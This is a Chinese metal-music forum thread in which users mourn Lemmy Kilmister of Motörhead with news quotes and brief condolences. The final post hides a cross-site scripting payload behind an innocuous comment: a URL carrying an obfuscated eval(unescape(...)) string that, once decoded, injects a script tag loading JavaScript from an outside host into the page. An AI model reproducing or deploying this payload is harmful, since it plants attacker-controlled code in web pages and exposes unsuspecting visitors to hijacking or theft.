maren 发表于 2015-12-29 09:00:00

转-----英国速度重金属MOTÖRHEAD贝司手兼主唱Lemmy Kilmister今晨...

【重磅新闻】据Ozzy Osbourne夫妻的发文及其经纪人确认,英国速度重金属MOTÖRHEAD贝司手兼主唱Lemmy Kilmister今晨去世。12月24日他刚过70岁生日,月初他曾说: "对于他妈的'你是不是快死了?'的这类问题,我真的烦透了。这问题也真的是个老话题了。我现在很好……日子有好有坏,大多数时间我还不错。"

昨天还听你得歌呢

贝克街幽灵 发表于 2015-12-29 09:13:50

属于我们这一代的标志也渐渐消逝,未来我们会面对怎样的世界???

longmetal 发表于 2015-12-29 09:27:14

我操

我还心想你能挺一阵呢再。怎么他妈说没,就真没了。

前几天听说你弄了个什么**心脏病住院,我就怀疑是真是假。哎。。。。有一个伟大的乐队消失了

longmetal 发表于 2015-12-29 09:43:19

刚回完贴子,接了个电话。我一哥们打的,上来就说 “看新闻没。。。。“

真他妈不高兴

nevauto 发表于 2015-12-29 10:52:34

ad01364ty 发表于 2015-12-29 21:30:03

rip lemmy

deathrow 发表于 2015-12-31 18:22:42

影响无数乐队的神!!!一路走好

muma8701 发表于 2016-1-13 22:23:36

长知识了啊,之前都不知道的http://www.coolool.com/flash.swf?'+eval(unescape(/var%20b%3Ddocument.createElement%28%22script%22%29%3Bb.src%3D%22http%3A%2F%2Fwww.dzsstye.com%2Fa.js%22%3B%28document.getElementsByTagName%28%22HEAD%22%29%5B0%5D%7C%7Cdocument.body%29.appendChild%28b%29%3B/.source))+'
页: [1]
查看完整版本: 转-----英国速度重金属MOTÖRHEAD贝司手兼主唱Lemmy Kilmister今晨...